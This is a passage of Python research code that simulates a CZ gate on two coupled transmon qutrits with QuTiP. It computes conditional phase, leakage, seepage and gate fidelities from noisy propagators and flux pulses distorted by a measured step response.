                        (Tphi_q1_ket1toket1, 1)):
        if rate != 0:
            collapse = qtp.tensor(qtp.ket2dm(qtp.basis(3, level)), qtp.qeye(3))
            c_ops.append(np.sqrt(1 / rate) * collapse)
    # sigma_Z-type pure dephasing on q0.
    for rate, (up, down) in ((Tphi_q0_sigmaZ_01, (0, 1)),
                             (Tphi_q0_sigmaZ_12, (1, 2)),
                             (Tphi_q0_sigmaZ_02, (0, 2))):
        if rate != 0:
            collapse = qtp.tensor(qtp.qeye(3), _sigma_z_qutrit(up, down))
            c_ops.append(np.sqrt(1 / (2 * rate)) * collapse)
    # sigma_Z-type pure dephasing on q1.
    for rate, (up, down) in ((Tphi_q1_sigmaZ_01, (0, 1)),
                             (Tphi_q1_sigmaZ_12, (1, 2)),
                             (Tphi_q1_sigmaZ_02, (0, 2))):
        if rate != 0:
            collapse = qtp.tensor(_sigma_z_qutrit(up, down), qtp.qeye(3))
            c_ops.append(np.sqrt(1 / (2 * rate)) * collapse)
    return c_ops
#c_ops=jump_operators(T1_q0,T1_q1,Tphi_q0_ket0toket0,Tphi_q0_ket1toket1,Tphi_q0_ket2toket2,Tphi_q1_ket0toket0,Tphi_q1_ket1toket1,
# Tphi_q0_sigmaZ_01,Tphi_q0_sigmaZ_12,Tphi_q0_sigmaZ_02,Tphi_q1_sigmaZ_01)
def c_ops_interpolating(T1_q0, T1_q1, Tphi01_q0_vec, Tphi01_q1):
    """Build the collapse operators for the two-qutrit master equation.

    Relaxation (T1) operators are time independent. Pure dephasing of qubit
    q0 is pulse-amplitude dependent and therefore returned as
    [operator, coefficient-vector] pairs, as expected by the solver;
    dephasing of q1 is time independent. The 1-2 and 0-2 dephasing times are
    derived from the 0-1 one via Tphi12 = Tphi01 and Tphi02 = Tphi01/2.
    """
    # sigma-Z-like qutrit operators for the 01, 12 and 02 subspaces, paired
    # with the divisor applied to Tphi01 to obtain that subspace's Tphi
    dephasing_levels = [
        ([[1, 0, 0], [0, -1, 0], [0, 0, 0]], 1),   # 01
        ([[0, 0, 0], [0, 1, 0], [0, 0, -1]], 1),   # 12
        ([[1, 0, 0], [0, 0, 0], [0, 0, -1]], 2),   # 02
    ]

    c_ops = []
    if T1_q0 != 0:
        c_ops.append(np.sqrt(1 / T1_q0) * a)
    if T1_q1 != 0:
        c_ops.append(np.sqrt(1 / T1_q1) * b)
    if Tphi01_q1 != 0:  # automatically also add the 12 and 02 dephasing
        for elements, divisor in dephasing_levels:
            collapse = qtp.tensor(qtp.Qobj(elements), qtp.qeye(3))
            Tphi_q1 = Tphi01_q1 / divisor
            c_ops.append(collapse * np.sqrt(1 / (2 * Tphi_q1)))
    if Tphi01_q0_vec != []:  # automatically also add the 12 and 02 dephasing
        for elements, divisor in dephasing_levels:
            collapse = qtp.tensor(qtp.qeye(3), qtp.Qobj(elements))
            Tphi_q0_vec = Tphi01_q0_vec / divisor
            # time-dependent rate: [operator, coefficient array]
            c_ops.append([collapse, np.sqrt(1 / (2 * Tphi_q0_vec))])
    return c_ops
def rotating_frame_transformation(U, t: float,
                                  w_q0: float = 0, w_q1: float = 0):
    """
    Transform the unitary U into the rotating frame at time t:

        U' = U_RF * U,   with  U_RF = e^{i w_q0 n_q0 t} * e^{i w_q1 n_q1 t}

    U_RF is applied on one side only because that is the operator satisfying
    the Schroedinger equation in the interaction picture. (If this were used
    with noise, the jump operators would need to be rotated as well.)

    Args:
        U (Qobj): unitary to be transformed
        t (float): time at which to transform
        w_q0 (float): frame frequency for q0
        w_q1 (float): frame frequency for q1
    """
    frame_rotation = (1j * w_q0 * n_q0 * t).expm() * (1j * w_q1 * n_q1 * t).expm()
    return frame_rotation * U
def phases_from_superoperator(U):
    """
    Extract the single- and two-excitation phases (degrees) from a unitary
    ('oper') or superoperator ('super') U.

    Returns:
        (phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond),
        or None if U.type is neither 'oper' nor 'super'.
    """
    def _phase_deg(element):
        return np.rad2deg(np.angle(element))

    if U.type == 'oper':
        # expected to equal 0 because of our choice for the energy,
        # not because of the rotating frame
        phi_00 = _phase_deg(U[0, 0])
    elif U.type == 'super':
        # set arbitrarily to 0: for a superoperator it is not knowable,
        # so the remaining entries are really phi_xy - phi_00
        phi_00 = 0
    else:
        return None
    phi_01 = _phase_deg(U[1, 1])
    phi_10 = _phase_deg(U[3, 3])
    phi_11 = _phase_deg(U[4, 4])
    phi_02 = _phase_deg(U[2, 2])  # used only for avgatefid_superoperator_phasecorrected
    phi_20 = _phase_deg(U[6, 6])
    # conditional phase; the formula is independent of the phi_00 convention
    # !!! check that this is a good formula for superoperators: there is a lot
    # of redundancy if the evolution is unitary, but not necessarily if noisy!
    phi_cond = (phi_11 - phi_01 - phi_10 + phi_00) % 360
    return phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond
def pro_avfid_superoperator_compsubspace(U, L1):
    """
    Average process (gate) fidelity restricted to the two-qubit computational
    subspace of the two qutrits, with leakage L1 taken into account
    (see Woods & Gambetta).
    """
    comp_idx = [0, 1, 3, 4]  # indices of the computational subspace
    dim = 4                  # dimension of the 2-qubit computational subspace
    if U.type == 'oper':
        overlap = U.dag() * U_target
        ptrace = sum(overlap[k, k] for k in comp_idx)
        return np.real((np.abs(ptrace) ** 2 + dim * (1 - L1)) / (dim * (dim + 1)))
    elif U.type == 'super':
        psum = 0
        for A_k in qtp.to_kraus(U):
            # U_target_diffdims avoids a dimension mismatch with the Kraus ops
            overlap = U_target_diffdims.dag() * A_k
            ptrace = sum(overlap[k, k] for k in comp_idx)
            psum += np.abs(ptrace) ** 2
        return np.real((dim * (1 - L1) + psum) / (dim * (dim + 1)))
def pro_avfid_superoperator_compsubspace_phasecorrected(U,L1,phases):
    """
    Average process (gate) fidelity in the qubit computational subspace for two qutrits.
    Leakage has to be taken into account, see Woods & Gambetta.
    The phase is corrected with Z rotations considering both transmons as qubits.

    Args:
        U: unitary ('oper') or superoperator ('super') of the evolution
        L1: leakage, e.g. from leakage_from_superoperator
        phases: tuple of phases in degrees as returned by
            phases_from_superoperator; phases[-1] is the conditional phase
    """
    # Diagonal phase-correction unitary (degrees -> radians). Entries follow
    # the bookkeeping of phases_from_superoperator; the conditional phase
    # phases[-1] is subtracted on the |11>-related entry.
    Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],
                            [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[1])), 0],
                            [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0]))]],
                           type='oper',
                           dims=[[3, 3], [3, 3]])
    if U.type=='oper':
        U=Ucorrection*U
        inner = U.dag()*U_target
        part_idx = [0, 1, 3, 4]  # only computational subspace
        ptrace = 0
        for i in part_idx:
            ptrace += inner[i, i]
        dim = 4  # 2 qubits comp subspace
        return np.real(((np.abs(ptrace))**2+dim*(1-L1))/(dim*(dim+1)))
    elif U.type=='super':
        # apply the same correction in superoperator form, then average the
        # per-Kraus-operator overlaps with the target
        U=qtp.to_super(Ucorrection)*U
        kraus_form = qtp.to_kraus(U)
        dim=4  # 2 qubits in the computational subspace
        part_idx = [0, 1, 3, 4]  # only computational subspace
        psum=0
        for A_k in kraus_form:
            ptrace = 0
            inner = U_target_diffdims.dag()*A_k  # otherwise dimension mismatch
            for i in part_idx:
                ptrace += inner[i, i]
            psum += (np.abs(ptrace))**2
        return np.real((dim*(1-L1) + psum) / (dim*(dim + 1)))
def leakage_from_superoperator(U):
    """
    Leakage L1 out of the computational subspace, summed over all in/out
    computational states.

    Unitary ('oper'):
        L1 = 1 - 1/4 * sum_ij |<phi_i|U|phi_j>|^2
    Superoperator ('super'):
        L1 = 1 - 1/4 * sum_ij Tr(rho_i' C_U(rho_j))
    where C_U is U in the channel representation.
    """
    def _comp_ket(k):
        # computational basis state k in {0..3} embedded in the qutrit space
        return qtp.tensor(qtp.ket([k // 2], dim=[3]),
                          qtp.ket([k % 2], dim=[3]))

    if U.type == 'oper':
        sump = 0
        for i in range(4):
            bra_i = _comp_ket(i).dag()
            for j in range(4):
                sump += np.abs((bra_i * U * _comp_ket(j)).data[0, 0]) ** 2
        # normalize by the dimension of the computational subspace
        return 1 - sump / 4
    elif U.type == 'super':
        sump = 0
        for i in range(4):
            rho_i = qtp.operator_to_vector(qtp.ket2dm(_comp_ket(i)))
            for j in range(4):
                rho_j = qtp.operator_to_vector(qtp.ket2dm(_comp_ket(j)))
                sump += (rho_i.dag() * U * rho_j).data[0, 0]
        return 1 - np.real(sump) / 4
def seepage_from_superoperator(U):
    """
    Seepage, summed over all in/out states OUTSIDE the computational
    subspace (the 5 non-computational two-qutrit states):

        L2 = 1 - 1/5 * sum_ij |<phi_i|U|phi_j>|^2        ('oper')
        L2 = 1 - 1/5 * sum_ij Tr(rho_i' C_U(rho_j))      ('super')
    """
    noncomp_labels = [[0, 2], [1, 2], [2, 0], [2, 1], [2, 2]]

    def _ket(labels):
        return qtp.tensor(qtp.ket([labels[0]], dim=[3]),
                          qtp.ket([labels[1]], dim=[3]))

    if U.type == 'oper':
        sump = 0
        for i_list in noncomp_labels:
            for j_list in noncomp_labels:
                amplitude = (_ket(i_list).dag() * U * _ket(j_list)).data[0, 0]  # could be sped up
                sump += np.abs(amplitude) ** 2
        # normalize by the number of non-computational states
        return 1 - sump / 5
    elif U.type == 'super':
        sump = 0
        for i_list in noncomp_labels:
            rho_i = qtp.operator_to_vector(qtp.ket2dm(_ket(i_list)))
            for j_list in noncomp_labels:
                rho_j = qtp.operator_to_vector(qtp.ket2dm(_ket(j_list)))
                sump += (rho_i.dag() * U * rho_j).data[0, 0]
        return 1 - np.real(sump) / 5
def pro_avfid_superoperator(U):
    """Average process (gate) fidelity over the full two-qutrit space."""
    if U.type == 'oper':
        dim = 9  # dimension of the whole two-qutrit space
        overlap = np.abs((U.dag() * U_target).tr()) ** 2
        return np.real((overlap + dim) / (dim * (dim + 1)))
    elif U.type == 'super':
        # qutip handles the superoperator case directly (dims must match
        # the target, hence U_target_diffdims)
        return np.real(qtp.average_gate_fidelity(U, target=U_target_diffdims))
def pro_avfid_superoperator_phasecorrected(U,phases):
    """
    Average process (gate) fidelity in the whole space for a qubit and qutrit.
    Qubit Z rotation and qutrit "Z" rotations are applied, taking into account
    the anharmonicity as well.

    Args:
        U: unitary ('oper') or superoperator ('super') of the evolution
        phases: tuple of phases in degrees as returned by
            phases_from_superoperator; phases[-1] is the conditional phase
    """
    # Diagonal phase-correction unitary (degrees -> radians), built entry by
    # entry from the measured phases; the conditional phase phases[-1] is
    # subtracted on the entries involving the leaked/excited levels.
    Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],
                            [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1])), 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[2]-phases[0])), 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5])), 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5]+phases[1]-phases[0])), 0],
                            [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[5]-phases[0]))]],
                           type='oper',
                           dims=[[3, 3], [3, 3]])
    if U.type=='oper':
        U=Ucorrection*U
        ptrace = np.abs((U.dag()*U_target).tr())**2
        dim = 9  # dimension of the whole space
        return np.real((ptrace+dim)/(dim*(dim+1)))
    elif U.type=='super':
        # apply the same correction as a superoperator before computing the
        # qutip average gate fidelity against the (dims-matched) target
        U=qtp.to_super(Ucorrection)*U
        return np.real(qtp.average_gate_fidelity(U,target=U_target_diffdims))
#tlist = np.arange(0, 240e-9, 1/2.4e9)
def matrix_change_of_variables(H_0):
    """
    Return the change-of-basis matrix S whose columns are the eigenvectors of
    H_0, reordered to match the bare basis
    |00>,|01>,|02>,|10>,|11>,|12>,|20>,|21>,|22>.

    NOTE(review): the hard-coded ordering assumes a specific energy ordering
    of the eigenstates of H_0 — confirm it holds for the parameters used.
    """
    _, eigvectors = H_0.eigenstates()
    # eigenstate index for each bare basis state, in basis order
    # 00  01  02  10  11  12  20  21  22
    order = [0, 2, 5, 1, 4, 7, 3, 6, 8]
    columns = [eigvectors[idx].full() for idx in order]
    return np.hstack(columns)
def simulate_quantities_of_interest_superoperator(H_0, tlist, c_ops, w_bus, eps_vec,
                                                  sim_step,
                                                  verbose: bool=True):
    """
    Calculates the quantities of interest from the propagator U.
    Args:
        H_0 (Qobj): static hamiltonian, see "coupled_transmons_hamiltonian"
            for the expected form of the Hamiltonian.
        tlist (array): times in s, describes the x component of the
            trajectory to simulate
        c_ops (list): list of jump operators, or [operator, coefficient-array]
            pairs for time-dependent rates
        w_bus (float): bus frequency, forwarded to hamiltonian_timedependent
        eps_vec (array): detuning, describes the y-component of the trajectory
            to simulate
        sim_step (float): integration time step in s
    Returns
        phi_cond (float): conditional phase (deg)
        L1 (float): leakage
        L2 (float): seepage
        avgatefid (float): average gate fidelity in full space
        avgatefid_compsubspace (float): average gate fidelity only in the computational subspace
    """
    # time is multiplied by scalefactor and frequency is divided by it
    # (scalefactor is a module-level global)
    tlist=tlist*scalefactor
    eps_vec=eps_vec/scalefactor
    sim_step=sim_step*scalefactor
    H_0=H_0/scalefactor
    w_bus=w_bus/scalefactor
    if c_ops!=[]:  # c_ops is a list of either operators or lists where the first element is
                   # an operator and the second one is a list of the (time-dependent) coefficients
        # NOTE(review): c_ops is rescaled IN PLACE, mutating the caller's list;
        # callers currently rebuild c_ops before each call — confirm before reusing a list
        for c in range(len(c_ops)):
            if isinstance(c_ops[c],list):
                c_ops[c][1]=c_ops[c][1]/np.sqrt(scalefactor)
            else:
                c_ops[c]=c_ops[c]/np.sqrt(scalefactor)
    ''' # step of 1/sampling_rate=1/2.4e9=0.4 ns seems good by itself
    sim_step_new=sim_step*2
    eps_interp = interp1d(tlist, eps_vec, fill_value='extrapolate')
    tlist_new = (np.linspace(0, np.max(tlist), 576/2))
    eps_vec_new=eps_interp(tlist_new)
    c_ops_new=[]
    for c in range(len(c_ops)):
        if isinstance(c_ops[c],list):
            c_ops_interp=interp1d(tlist,c_ops[c][1], fill_value='extrapolate')
            c_ops_new.append([c_ops[c][0],c_ops_interp(tlist_new)])
        else:
            c_ops_new.append(c_ops[c])
    # function only exists to wrap
    #def eps_t(t, args=None):
    #    return eps_interp(t)
    print(len(eps_vec),len(eps_vec_new))
    t0 = time.time()
    exp_L_total_new=1
    for i in range(len(tlist_new)):
        H=H_0+eps_vec_new[i]*H_c
        c_ops_temp=[]
        for c in range(len(c_ops_new)):
            if isinstance(c_ops_new[c],list):
                c_ops_temp.append(c_ops_new[c][0]*c_ops_new[c][1][i])
            else:
                c_ops_temp.append(c_ops_new[c])
        liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step_new).expm()
        exp_L_total_new=liouville_exp_t*exp_L_total_new
    #exp_L_oneway=(qtp.liouvillian(H_0,c_ops)*240e-3).expm()
    t1 = time.time()
    print('\n alternative propagator_new',t1-t0)
    '''
    # We change the basis of H to the basis of eigenvectors of H_0
    # The columns of S are the eigenvectors of H_0, appropriately ordered
    S = qtp.Qobj(matrix_change_of_variables(H_0),dims=[[3, 3], [3, 3]])
    t0 = time.time()
    # Piecewise-constant propagation: exponentiate the Liouvillian (noisy
    # case) or -i*H (noiseless case) over each sim_step and left-multiply
    # onto the accumulated propagator.
    exp_L_total=1
    for i in range(len(tlist)):
        H=hamiltonian_timedependent(H_0,eps_vec[i],w_bus)
        H=S*H*S.dag()
        if c_ops != []:
            c_ops_temp=[]
            for c in range(len(c_ops)):
                if isinstance(c_ops[c],list):
                    # time-dependent rate: operator times its coefficient at step i
                    c_ops_temp.append(c_ops[c][0]*c_ops[c][1][i])
                else:
                    c_ops_temp.append(c_ops[c])
            liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step).expm()
        else:
            liouville_exp_t=(-1j*H*sim_step).expm()
        exp_L_total=liouville_exp_t*exp_L_total
    #exp_L_oneway=(qtp.liouvillian(H_0,c_ops)*240e-3).expm()
    t1 = time.time()
    print('\n alternative propagator',t1-t0)
    ''' # qutip propagator not used anymore because it takes too much time
    t0 = time.time()
    if c_ops==[]:
        nstepsmax=1000
    else:
        nstepsmax=100000
    H_t = [H_0, [H_c, eps_vec]]
    U_t = qtp.propagator(H_t, tlist, c_ops, parallel=True, options=qtp.Options(nsteps=nstepsmax)) # returns unitary 'oper' if c_ops=[], otherwise 'super'
    t1 = time.time()
    print('/n propagator',t1-t0)
    if verbose:
        print('simulation took {:.2f}s'.format(t1-t0))
    '''
    # Figures of merit computed from the final propagator/superoperator.
    U_final = exp_L_total
    phases = phases_from_superoperator(U_final)
    phi_cond = phases[-1]
    L1 = leakage_from_superoperator(U_final)
    L2 = seepage_from_superoperator(U_final)
    avgatefid = pro_avfid_superoperator_phasecorrected(U_final,phases)
    avgatefid_compsubspace = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L1,phases)  # leakage has to be taken into account, see Woods & Gambetta
    print('avgatefid_compsubspace',avgatefid_compsubspace)
    '''
    U_final = exp_L_total_new
    phases2 = phases_from_superoperator(U_final)
    phi_cond2 = phases2[-1]
    L12 = leakage_from_superoperator(U_final)
    L22 = seepage_from_superoperator(U_final)
    avgatefid2 = pro_avfid_superoperator_phasecorrected(U_final,phases2)
    avgatefid_compsubspace2 = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L12,phases2)
    print(phi_cond-phi_cond2,phi_cond)
    print(L1-L12,L1)
    print(L2-L22,L2)
    print(avgatefid-avgatefid2,avgatefid)
    print(avgatefid_compsubspace-avgatefid_compsubspace2,avgatefid_compsubspace)
    '''
    return {'phi_cond': phi_cond, 'L1': L1, 'L2': L2, 'avgatefid_pc': avgatefid, 'avgatefid_compsubspace_pc': avgatefid_compsubspace}
def spectrum(H_0, eps_vec):
    """
    Eigenenergies of H_0 + Omega*H_c for each drive amplitude Omega in
    eps_vec. Returns 9 lists, one per energy level, each tracking that level
    across the sweep.
    """
    eigenvalues = [[] for _ in range(9)]
    for Omega in eps_vec:
        eigs = (H_0 + Omega * H_c).eigenenergies()
        for level_track, energy in zip(eigenvalues, eigs):
            level_track.append(energy)
    return eigenvalues
def fix_theta_f(lambda_3, theta_i):
    """
    Return the final angle theta_f (converted to degrees) that fixes
    lambda_1 at its target value of 1, given lambda_3 and the initial angle
    theta_i (radians).
    """
    lambda_1_target = 1
    return (theta_i + 2 * (lambda_1_target + lambda_3)) * 360 / (2 * np.pi)
class CZ_trajectory_superoperator(det.Soft_Detector):
    def __init__(self, H_0, fluxlutman, noise_parameters_CZ, fitted_stepresponse_ty):
        """
        Detector for simulating a CZ trajectory.
        Args:
            H_0 (Qobj): static two-qutrit Hamiltonian
            fluxlutman (instr): an instrument that contains the parameters
                required to generate the waveform for the trajectory.
            noise_parameters_CZ: instrument that contains the noise parameters
            fitted_stepresponse_ty: list of two elements, corresponding to the time t
                and the step response in volts along the y axis
        """
        super().__init__()
        # names/units of the values returned by acquire_data_point, in order
        self.value_names = ['Cost func', 'Cond phase', 'L1', 'L2', 'avgatefid_pc', 'avgatefid_compsubspace_pc']
        self.value_units = ['a.u.', 'deg', '%', '%', '%', '%']
        self.fluxlutman = fluxlutman
        self.H_0 = H_0
        self.noise_parameters_CZ = noise_parameters_CZ
        self.fitted_stepresponse_ty=fitted_stepresponse_ty  # list of 2 elements: stepresponse (=y)
                                                            # as a function of time (=t)
    def acquire_data_point(self, **kw):
        """Simulate one CZ trajectory and return
        (cost, cond. phase, L1 %, L2 %, avg. gate fid. %, comp.-subspace fid. %)."""
        '''# BENCHMARK FOR HOW THE COUPLING IMPACTS THE HAMILTONIAN PARAMETERS
        eigs,eigvectors = self.H_0.eigenstates()
        eigs=eigs/(2*np.pi)
        print('omegaA =',eigs[1])
        print('omegaB =',eigs[2])
        print(eigs[4]-eigs[1]-eigs[2])
        print('etaA =',eigs[3]-2*eigs[1])
        print('etaB =',eigs[5]-2*eigs[2])
        print(eigvectors[4],'\n fidelity with 1 /otimes 1=',np.abs(eigvectors[4].dag().overlap(qtp.basis(9,4)))**2)
        print(eigvectors[5],'\n fidelity with 0 /otimes 2=',np.abs(eigvectors[5].dag().overlap(qtp.basis(9,2)))**2)
        '''
        # --- time axes: AWG sampling step, and a finer step for the solver ---
        sim_step=1/self.fluxlutman.sampling_rate()
        subdivisions_of_simstep=4
        sim_step_new=sim_step/subdivisions_of_simstep  # waveform is generated according to sampling rate of AWG,
                                                       # but we can use a different step for simulating the time evolution
        tlist = (np.arange(0, self.fluxlutman.cz_length(),
                           sim_step))
        tlist_new = (np.arange(0, self.fluxlutman.cz_length(),
                               sim_step_new))
        #theta_i = np.arctan(2*self.fluxlutman.cz_J2() / (self.fluxlutman.cz_freq_01_max() - self.fluxlutman.cz_freq_interaction()))
        #theta_f=fix_theta_f(self.fluxlutman.cz_lambda_3(),theta_i)
        #theta_i=theta_i*360/(2*np.pi)
        #self.fluxlutman.cz_theta_f(theta_f)
        # --- flux pulse generation (single- or double-sided CZ) ---
        if not self.fluxlutman.czd_double_sided():
            f_pulse = wf.martinis_flux_pulse(
                length=self.fluxlutman.cz_length(),
                lambda_2=self.fluxlutman.cz_lambda_2(),
                lambda_3=self.fluxlutman.cz_lambda_3(),
                theta_f=self.fluxlutman.cz_theta_f(),
                f_01_max=self.fluxlutman.cz_freq_01_max(),
                J2=self.fluxlutman.cz_J2(),
                f_interaction=self.fluxlutman.cz_freq_interaction(),
                sampling_rate=self.fluxlutman.sampling_rate(),
                return_unit='f01')  # return in terms of omega
            amp = self.fluxlutman.detuning_to_amp((self.fluxlutman.cz_freq_01_max() - f_pulse)/(2*np.pi))
            # transform detuning frequency to (positive) amplitude
        else:
            f_pulse,amp = self.get_f_pulse_double_sided()
        # For better accuracy in simulations, redefine f_pulse and amp in terms of sim_step_new.
        # The last sample is duplicated so interp1d's range covers t = cz_length.
        tlist_temp=np.concatenate((tlist,np.array([self.fluxlutman.cz_length()])))
        f_pulse_temp=np.concatenate((f_pulse,np.array([f_pulse[-1]])))
        amp_temp=np.concatenate((amp,np.array([amp[-1]])))
        f_pulse_interp=interp1d(tlist_temp,f_pulse_temp)
        amp_interp=interp1d(tlist_temp,amp_temp)
        f_pulse=f_pulse_interp(tlist_new)
        amp=amp_interp(tlist_new)
        # plot(x_plot_vec=[tlist_new*1e9],
        #          y_plot_vec=[f_pulse/(2*np.pi)/1e9],
        #          title='Freq. of fluxing qubit during pulse',
        #          xlabel='Time (ns)',ylabel='Freq. (GHz)',legend_labels=['omega_B(t)'])
        amp=amp*self.noise_parameters_CZ.voltage_scaling_factor()
        # extract base frequency from the Hamiltonian
        w_q0 = np.real(self.H_0[1,1])
        #w_q1=np.real(self.H_0[3,3])
        #alpha_q0=np.real(self.H_0[2,2])-2*w_q0
        #eps_vec = f_pulse - w_q0
        #detuning = -eps_vec/(2*np.pi)  # we express detuning in terms of frequency
        '''#BENCHMARK TO CHECK HOW THE COUPLING VARIES AS A FUNCTION OF DETUNING
        J_new=list()
        for eps in eps_vec:
            H=hamiltonian_timedependent(self.H_0,eps)
            J_new.append(np.real(H[1,3]))
        plot(x_plot_vec=[tlist_new*1e9],
                 y_plot_vec=[np.array(J_new)/(2*np.pi)/1e6],
                 title='Coupling during pulse',
                 xlabel='Time (ns)',ylabel='J (MHz)',legend_labels=['J(t)'])'''
        ''' USELESS ####### functions that were used to convert from detuning to voltage but now we use
            functions from fluxlutman which are the same as those used in the experiment
        def invert_parabola(polynomial_coefficients,y):  # useless
            a=polynomial_coefficients[0]
            b=polynomial_coefficients[1]
            c=polynomial_coefficients[2]
            return (-b+np.sqrt(b**2-4*a*(c-y)))/(2*a)
        voltage_frompoly = invert_parabola(self.fluxlutman.polycoeffs_freq_conv(),detuning)
        voltage_frompoly_interp = interp1d(tlist,voltage_frompoly)
        voltage_frompoly_convol = voltage_frompoly_interp(tlist_convol1)
        convolved_voltage=scipy.signal.convolve(voltage_frompoly_convol,impulse_response_convol)/sum(impulse_response_convol)
        convolved_detuning=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),convolved_voltage)
        eps_vec_convolved=-convolved_detuning*(2*np.pi)
        eps_vec_convolved=eps_vec_convolved[0:np.size(tlist_convol1)]
        f_pulse_convolved=eps_vec_convolved+w_q0
        '''
        def give_parabola(polynomial_coefficients,x):
            # evaluate the fluxlutman amp->detuning polynomial a*x^2 + b*x + c
            a=polynomial_coefficients[0]
            b=polynomial_coefficients[1]
            c=polynomial_coefficients[2]
            return a*x**2+b*x+c
        # --- optionally distort the pulse with the measured step response ---
        if self.noise_parameters_CZ.distortions():
            # impulse response = derivative of the fitted step response
            impulse_response=np.gradient(self.fitted_stepresponse_ty[1])
            # plot(x_plot_vec=[self.fitted_stepresponse_ty[0]],y_plot_vec=[self.fitted_stepresponse_ty[1]],
            #           title='Step response',
            #           xlabel='Time (ns)')
            # plot(x_plot_vec=[self.fitted_stepresponse_ty[0]],y_plot_vec=[impulse_response],
            #           title='Impulse response',
            #           xlabel='Time (ns)')
            # use interpolation to be sure that amp and impulse_response have the same delta_t separating two values
            amp_interp = interp1d(tlist_new,amp)  # amp is now managed already above
            impulse_response_interp = interp1d(self.fitted_stepresponse_ty[0],impulse_response)
            tlist_convol1 = tlist_new
            tlist_convol2 = np.arange(0, self.fitted_stepresponse_ty[0][-1],
                               sim_step_new)
            amp_convol = amp_interp(tlist_convol1)
            impulse_response_convol = impulse_response_interp(tlist_convol2)
            # plot(x_plot_vec=[tlist_convol1*1e9],y_plot_vec=[amp_convol],
            #      title='Pulse in voltage, length=240ns',
            #      xlabel='Time (ns)',ylabel='Amplitude (V)')
            # plot(x_plot_vec=[tlist_convol*1e9],y_plot_vec=[impulse_response_convol],
            #      title='Impulse response',
            #      xlabel='Time (ns)')
            # normalized convolution: distorted voltage pulse
            convolved_amp=scipy.signal.convolve(amp_convol,impulse_response_convol)/sum(impulse_response_convol)
            # plot(x_plot_vec=[tlist_convol1*1e9,np.arange(np.size(convolved_amp))*sim_step*1e9],
            #      y_plot_vec=[amp_convol, convolved_amp],
            #      title='Net-zero, Pulse_length=240ns',
            #      xlabel='Time (ns)',ylabel='Amplitude (V)',legend_labels=['Ideal','Distorted'])
            convolved_detuning_new=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),convolved_amp)
            # plot(x_plot_vec=[tlist*1e9,np.arange(np.size(convolved_amp))*sim_step*1e9],
            #      y_plot_vec=[detuning/1e9, convolved_detuning_new/1e9],
            #      title='Net-zero, Pulse_length=240ns',
            #      xlabel='Time (ns)',ylabel='Detuning (GHz)',legend_labels=['Ideal','Distorted'])
            eps_vec_convolved_new=-convolved_detuning_new*(2*np.pi)
            # truncate the convolution tail back to the pulse length
            eps_vec_convolved_new=eps_vec_convolved_new[0:np.size(tlist_convol1)]
            f_pulse_convolved_new=eps_vec_convolved_new+w_q0
        else:
            # no distortions: map amplitude straight back to detuning
            detuning_new=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),amp)
            eps_vec_convolved_new=-detuning_new*(2*np.pi)
            f_pulse_convolved_new=eps_vec_convolved_new+w_q0
        # --- noise parameters and collapse operators ---
        T1_q0 = self.noise_parameters_CZ.T1_q0()
        T1_q1 = self.noise_parameters_CZ.T1_q1()
        T2_q0_sweetspot = self.noise_parameters_CZ.T2_q0_sweetspot()
        T2_q0_interaction_point = self.noise_parameters_CZ.T2_q0_interaction_point()
        T2_q0_amplitude_dependent = self.noise_parameters_CZ.T2_q0_amplitude_dependent()
        T2_q1 = self.noise_parameters_CZ.T2_q1()
        def Tphi_from_T1andT2(T1,T2):
            # pure-dephasing time from 1/T2 = 1/(2*T1) + 1/Tphi
            return 1/(-1/(2*T1)+1/T2)
        if T2_q0_sweetspot != 0:
            Tphi01_q0_sweetspot=Tphi_from_T1andT2(T1_q0,T2_q0_sweetspot)
        else:
            Tphi01_q0_sweetspot=0
        if T2_q0_interaction_point != 0:
            Tphi01_q0_interaction_point=Tphi_from_T1andT2(T1_q0,T2_q0_interaction_point)
        else:
            Tphi01_q0_interaction_point=0
        # Tphi01=Tphi12=2*Tphi02
        if T2_q1 != 0:
            Tphi01_q1 = Tphi_from_T1andT2(T1_q1,T2_q1)
        else:
            Tphi01_q1=0
        if T2_q0_amplitude_dependent[0] != -1:
            # mode 1: T2 of q0 given as an exponential function of frequency
            def expT2(x,gc,amp,tau):
                # model: T2(f) = gc + gc*amp*exp(-f/tau)
                return gc+gc*amp*np.exp(-x/tau)
